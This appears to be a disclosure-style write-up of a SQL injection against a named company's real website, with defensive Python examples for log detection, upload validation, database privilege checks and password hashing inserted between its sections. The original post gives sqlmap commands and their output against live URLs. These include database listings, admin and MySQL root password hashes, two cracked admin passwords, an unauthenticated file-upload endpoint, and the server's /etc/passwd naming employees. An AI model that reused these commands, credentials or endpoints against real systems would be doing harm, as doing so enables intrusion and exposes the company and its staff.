WebPower official site SQL injection: admin backend accessed, database running with root privileges
http://www.webpowerasia.com/m/con.php?id=11
Tested with sqlmap:
Code:
available databases [19]:
[*] information_schema
[*] k11_birthday
[*] k11_optin
[*] ktest
[*] mysql
[*] phpmyadmin
[*] site_xbox
[*] task
[*] ued_wiki
[*] webpower_website
[*] wechat_site
[*] wp-e-sight
[*] wp-e-sight-en
[*] wp_e-home
[*] wp_faq
[*] wp_task
[*] wp_tl-group
[*] wp_webpowerasia
[*] wp_website
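As an added defender-side example (not part of the original post): enumeration of this kind leaves a recognisable trail in the web server's access log long before a database listing like the one above is produced. The Python below scans constructed Apache combined-format lines for the /m/con.php?id= endpoint named on the page and flags any request whose id parameter is not a plain integer, contains SQL keywords or metacharacters, or carries the default sqlmap User-Agent. The log lines, the client IPs and the NUMERIC_PARAMS rule are assumptions made for the example.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample log lines (Apache "combined" format); not from the page's server.
SAMPLE_LOG = r'''
203.0.113.5 - - [04/Apr/2016:01:05:10 +0800] "GET /m/con.php?id=11 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Apr/2016:01:05:12 +0800] "GET /m/con.php?id=11%27 HTTP/1.1" 500 0 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Apr/2016:01:05:14 +0800] "GET /m/con.php?id=11%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev"
203.0.113.5 - - [04/Apr/2016:01:05:15 +0800] "GET /m/con.php?id=11%20UNION%20ALL%20SELECT%20NULL%2CNULL HTTP/1.1" 200 5200 "-" "sqlmap/1.0-dev"
203.0.113.5 - - [04/Apr/2016:01:05:17 +0800] "GET /m/con.php?id=11%20AND%20SLEEP%285%29 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev"
198.51.100.7 - - [04/Apr/2016:01:06:00 +0800] "GET /m/con.php?id=29 HTTP/1.1" 200 4980 "-" "Mozilla/5.0"
'''

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Boolean/union/time-based probes and the metacharacters used to break out of a literal.
SQLI_PATTERN = re.compile(
    r"(?i)(\bunion\b[\s\S]*\bselect\b|\b(and|or)\s+\d+\s*=\s*\d+"
    r"|\b(sleep|benchmark|load_file)\s*\(|information_schema|['\"]|--|#|/\*)"
)

# Assumed schema rule for this endpoint: id must be a bare integer.
NUMERIC_PARAMS = {"id"}


def classify_value(name, value):
    """Return the list of reasons a single query parameter looks like an injection probe."""
    reasons = []
    if name in NUMERIC_PARAMS and not re.fullmatch(r"\d+", value):
        reasons.append(f"non-numeric {name}")
    if SQLI_PATTERN.search(value):
        reasons.append("sql keyword/metacharacter")
    return reasons


def scan_log(text):
    """Parse combined-format lines and return one finding per suspicious request."""
    findings = []
    for raw in text.strip().splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # skip lines that are not in the expected format
        reasons = []
        target = m.group("target")
        # parse_qsl percent-decodes values, so "11%27" is inspected as "11'"
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            reasons.extend(classify_value(name, value))
        if "sqlmap" in m.group("ua").lower():
            reasons.append("sqlmap user-agent")
        if reasons:
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "target": unquote_plus(target),
                "status": m.group("status"),
                "reasons": reasons,
            })
    return findings


def hits_by_ip(findings):
    """Count suspicious requests per source address; a burst from one IP is the typical sqlmap signature."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["status"], f["target"], "->", ", ".join(f["reasons"]))
    print(hits_by_ip(scan_log(SAMPLE_LOG)))
```

Two of the six constructed lines are normal traffic and produce no finding; the other four are flagged, and the per-IP count makes the scanning session stand out. In production the same rules belong in a WAF or SIEM query, and the underlying fix is a parameterised query (or an integer cast) in con.php so that no value of id reaches the SQL string.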
First, let's take the website:
Try to locate the site's own database and retrieve the backend username and password:
Code:
Database: wp_webpowerasia
[16 tables]
+-------------------+
| cases_category |
| customer_category |
| manage_about |
| manage_admin |
| manage_admin_log |
| manage_apply |
| manage_cases |
| manage_config |
| manage_customer |
| manage_event |
| manage_links |
| manage_mt |
| manage_news |
| manage_post |
| post_category |
| tag_category |
+-------------------+
Database: wp_webpowerasia
Table: manage_admin
[4 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| content | mediumtext |
| id | int(11) |
| username | varchar(200) |
| userpassword | varchar(200) |
+--------------+--------------+
Database: wp_webpowerasia
Table: manage_admin
[1 entry]
+----------+----------------------------------+
| username | userpassword |
+----------+----------------------------------+
| admin | 6966fe537468bb6a170b3c40ba22538d |
+----------+----------------------------------+
The hash cracks to: webp0wer, which gives access to the backend:
http://www.webpowerasia.com/manage/index.php
Try logging in:
The site has two kinds of upload: one is the editor, CKEditor 3.2.1 (revision 5372), where the uploaded file name can be modified; the other is a custom-written uploader, and that one allows arbitrary file upload:
http://www.webpowerasia.com//uploadfile/201604/20160404010622.txt
The upload endpoint can be reached without authorization:
http://www.webpowerasia.com//manage/post/up_pic.php
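The custom uploader above fails in two independent ways: it is reachable without a session, and it keeps whatever extension the client supplies. As an added example (not the site's code), the Python function below shows the checks a hardened image uploader would make: require an authenticated user, cap the size, accept only an allow-listed extension, confirm the file's leading bytes match that type, and store the file under a server-generated name so the client's filename never reaches disk. The UPLOAD_DIR path, the size limit and the magic-byte table are assumptions for the example.

```python
import os
import secrets

# Allow-listed extensions and the leading bytes each must carry (assumed policy for this example).
ALLOWED_EXT = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}
# Hypothetical storage directory: outside the web root, or served with script execution disabled.
UPLOAD_DIR = "/srv/uploads"
MAX_BYTES = 2 * 1024 * 1024


def check_upload(session_user, client_filename, data, max_bytes=MAX_BYTES):
    """Return (accepted, detail). On acceptance, detail is the server-chosen destination path."""
    if not session_user:
        return False, "not authenticated"
    if len(data) > max_bytes:
        return False, "too large"
    # Strip any directory component the client sent (both separator styles).
    base = os.path.basename(client_filename.replace("\\", "/"))
    if "\x00" in base or "." not in base:
        return False, "invalid filename"
    ext = base.rsplit(".", 1)[1].lower()
    magic = ALLOWED_EXT.get(ext)
    if magic is None:
        return False, f"extension .{ext} not allowed"
    if not data.startswith(magic):
        return False, "content does not match declared type"
    # The client name is discarded entirely; only the validated extension survives.
    server_name = f"{secrets.token_hex(16)}.{ext}"
    return True, os.path.join(UPLOAD_DIR, server_name)


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16  # constructed PNG header
    print(check_upload("admin", "photo.png", png))
    print(check_upload(None, "photo.png", png))
    print(check_upload("admin", "page.php", b"<?php echo 1;"))
```

Because the stored name is generated server-side, tricks such as double extensions or directory traversal in the client filename have nothing to act on; the remaining requirement is that the directory itself cannot execute scripts.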
The backend reveals the site's absolute path:
/var/www/html/webpowerasia
Now let's read files through the injection:
sqlmap.py -u "http://www.webpowerasia.com/m/con.php?id=29" --file-read "etc/passwd"
Code:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
qpidd:x:498:499:Owner of Qpidd Daemons:/var/lib/qpidd:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
tomcat:x:91:91:Apache Tomcat:/usr/share/tomcat6:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
alonso.chen:x:501:501::/home/alonso.chen:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
leo.chen:x:502:502::/home/leo.chen:/bin/bash
rocky.zhang:x:503:503::/home/rocky.zhang:/bin/bash
postmaster:x:504:504::/home/postmaster:/sbin/nologin
dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
dovenull:x:497:496:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin
koen:x:505:505::/home/koen:/bin/bash
kuku.li:x:507:507::/home/kuku.li:/bin/bash
bob.liu:x:508:508::/home/bob.liu:/bin/bash
michael.han:x:509:510::/home/michael.han:/bin/bash
mkt_upload:x:512:513::/var/www/html/webpowerwebsite/uploadfile/markting:/bin/bash
pluto.chan:x:513:514::/home/pluto.chan:/bin/bash
rain.zhao:x:514:515::/home/rain.zhao:/bin/bash
zabbix:x:496:495:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
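As an added note on why the file read above succeeded (example code, not the page's): sqlmap's --file-read uses MySQL's LOAD_FILE(), which requires the global FILE privilege and is governed by the secure_file_priv server variable; here the injected query ran as root, so nothing stopped it. The Python below evaluates SHOW GRANTS lines for the application's database account together with the secure_file_priv value and reports the exposure. The grant strings and variable values are constructed inputs, not output from the page's server.

```python
import re
from typing import Optional

# SHOW GRANTS output has the form: GRANT <privs> ON <scope> TO '<user>'@'<host>' ...
GRANT_RE = re.compile(r"^GRANT (?P<privs>.+?) ON (?P<scope>\S+) TO ", re.IGNORECASE)
# Privilege lists that confer FILE when granted at global (*.*) scope.
FILE_GRANTING = {"ALL PRIVILEGES", "ALL", "FILE"}


def has_file_privilege(grant_lines):
    """FILE is a global privilege: only a GRANT ... ON *.* can confer it."""
    for line in grant_lines:
        m = GRANT_RE.match(line.strip())
        if not m or m.group("scope") != "*.*":
            continue
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        if privs & FILE_GRANTING:
            return True
    return False


def load_file_exposure(grant_lines, secure_file_priv: Optional[str]):
    """Describe what LOAD_FILE()/SELECT ... INTO OUTFILE can reach for this account.

    secure_file_priv semantics: NULL disables file import/export entirely, an empty
    string places no restriction, and a directory name confines operations to it.
    Even when unrestricted, the file must be readable by the mysqld OS user.
    """
    if not has_file_privilege(grant_lines):
        return "no FILE privilege: LOAD_FILE()/INTO OUTFILE refused"
    if secure_file_priv is None:
        return "secure_file_priv=NULL: file import/export disabled server-wide"
    if secure_file_priv == "":
        return "secure_file_priv empty: any file readable by the mysqld OS user is exposed"
    return f"secure_file_priv restricts file access to {secure_file_priv}"


# Constructed examples: a root-style account versus a least-privilege application account.
ROOT_GRANTS = ["GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION"]
APP_GRANTS = [
    "GRANT USAGE ON *.* TO 'webapp'@'localhost'",
    "GRANT SELECT, INSERT, UPDATE, DELETE ON `wp_webpowerasia`.* TO 'webapp'@'localhost'",
]

if __name__ == "__main__":
    print(load_file_exposure(ROOT_GRANTS, ""))
    print(load_file_exposure(ROOT_GRANTS, None))
    print(load_file_exposure(APP_GRANTS, ""))
```

The two values are obtained with SHOW GRANTS FOR CURRENT_USER() and SELECT @@secure_file_priv from the connection the web application actually uses. The durable fix is the second profile: a dedicated account with table-level privileges on the site's own database and no global FILE grant, with secure_file_priv set to NULL or a dedicated directory as a second layer.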
The database usernames and password hashes can be retrieved as well; here is the rest of the data:
Code:
database management system users password hashes:
[*] alonso.chen [1]:
password hash: *80F2C54DD0E8548D01BCA1D75AB6E4A5FD1AA7BF
[*] root [2]:
password hash: *51BBF7BD5C01E0212ED1EC596FA7CCE962AA1B33
password hash: NULL
Database: wp_website
[16 tables]
+-------------------+
| cases_category |
| customer_category |
| manage_about |
| manage_admin |
| manage_admin_log |
| manage_apply |
| manage_cases |
| manage_config |
| manage_customer |
| manage_event |
| manage_links |
| manage_mt |
| manage_news |
| manage_post |
| post_category |
| tag_category |
+-------------------+
Table: manage_admin
[4 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| content | mediumtext |
| id | int(11) |
| username | varchar(200) |
| userpassword | varchar(200) |
+--------------+--------------+
Table: manage_admin
[1 entry]
+---------------+----------------------------------+
| username | userpassword |
+---------------+----------------------------------+
| webpowerchina | 1309112725a40e38aa14e35e3a50a53c |
+---------------+----------------------------------+
Database: wp_faq
Table: manage_admin
[9 entries]
+-------------+----------------------------------+
| username | userpassword |
+-------------+----------------------------------+
| admin | 6f292abc57aa3dde9ef9886c590d26f3 | Webpower1
| wp_leo | 6966fe537468bb6a170b3c40ba22538d |
| nicole.shen | b56e0b4ea4962283bee762525c2d490f |
| van.fan | 6966fe537468bb6a170b3c40ba22538d |
| monica.sun | 6966fe537468bb6a170b3c40ba22538d |
| joyce.huang | 76e2e42643666620948c29cc8ca48f78 |
| allen.jing | 4f066b79b7ffe87cb953536d470b07e0 |
| cathy | 25d55ad283aa400af464c76d713c07ad |
| <blank> | d41d8cd98f00b204e9800998ecf8427e |
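The hash cracked earlier (6966fe... for admin in wp_webpowerasia) and the wp_faq.manage_admin dump above tell the same story: passwords are stored as unsalted MD5, so identical hashes expose users who share a password, and the last row is the MD5 of the empty string. As an added example (not the site's code), the Python below audits rows transcribed from the dump for exactly those conditions and then shows the replacement scheme: PBKDF2-HMAC-SHA256 with a random per-user salt and a constant-time verify. The storage format string and the iteration count are assumptions for the example.

```python
import hashlib
import secrets
from collections import defaultdict

# Rows transcribed from the wp_faq.manage_admin dump above; sqlmap prints an empty
# username as "<blank>", which is represented here as "".
ADMIN_ROWS = [
    ("admin", "6f292abc57aa3dde9ef9886c590d26f3"),
    ("wp_leo", "6966fe537468bb6a170b3c40ba22538d"),
    ("nicole.shen", "b56e0b4ea4962283bee762525c2d490f"),
    ("van.fan", "6966fe537468bb6a170b3c40ba22538d"),
    ("monica.sun", "6966fe537468bb6a170b3c40ba22538d"),
    ("joyce.huang", "76e2e42643666620948c29cc8ca48f78"),
    ("allen.jing", "4f066b79b7ffe87cb953536d470b07e0"),
    ("cathy", "25d55ad283aa400af464c76d713c07ad"),
    ("", "d41d8cd98f00b204e9800998ecf8427e"),
]

MD5_EMPTY = hashlib.md5(b"").hexdigest()  # computed, not looked up


def looks_like_unsalted_md5(h):
    """A bare 32-hex-digit value with no algorithm tag or salt is almost certainly raw MD5."""
    return len(h) == 32 and all(c in "0123456789abcdef" for c in h.lower())


def audit(rows):
    """Flag unsalted hashes, shared hashes, empty passwords and blank usernames."""
    by_hash = defaultdict(list)
    report = {"unsalted_md5": [], "empty_password": [], "blank_username": []}
    for user, h in rows:
        by_hash[h].append(user)
        if looks_like_unsalted_md5(h):
            report["unsalted_md5"].append(user)
        if h == MD5_EMPTY:
            report["empty_password"].append(user)
        if user.strip() == "":
            report["blank_username"].append(user)
    # Without a salt, equal hashes mean equal passwords across accounts.
    report["shared_hashes"] = {h: users for h, users in by_hash.items() if len(users) > 1}
    return report


# Replacement scheme (assumed parameters): salted PBKDF2-HMAC-SHA256.
PBKDF2_ROUNDS = 600_000


def hash_password(plaintext, rounds=PBKDF2_ROUNDS):
    salt = secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", plaintext.encode(), salt, rounds)
    return f"pbkdf2_sha256${rounds}${salt.hex()}${dk.hex()}"


def verify_password(stored, plaintext):
    algo, rounds, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", plaintext.encode(), bytes.fromhex(salt_hex), int(rounds))
    return secrets.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    r = audit(ADMIN_ROWS)
    print("unsalted MD5 accounts:", len(r["unsalted_md5"]))
    for h, users in r["shared_hashes"].items():
        print("shared hash", h, "->", users)
    print("empty password:", r["empty_password"], "blank username:", r["blank_username"])
```

Migration does not require knowing the old passwords: each account is re-hashed with the new scheme at its next successful login, and accounts that have not logged in by a deadline are reset. The blank-username row should simply be deleted.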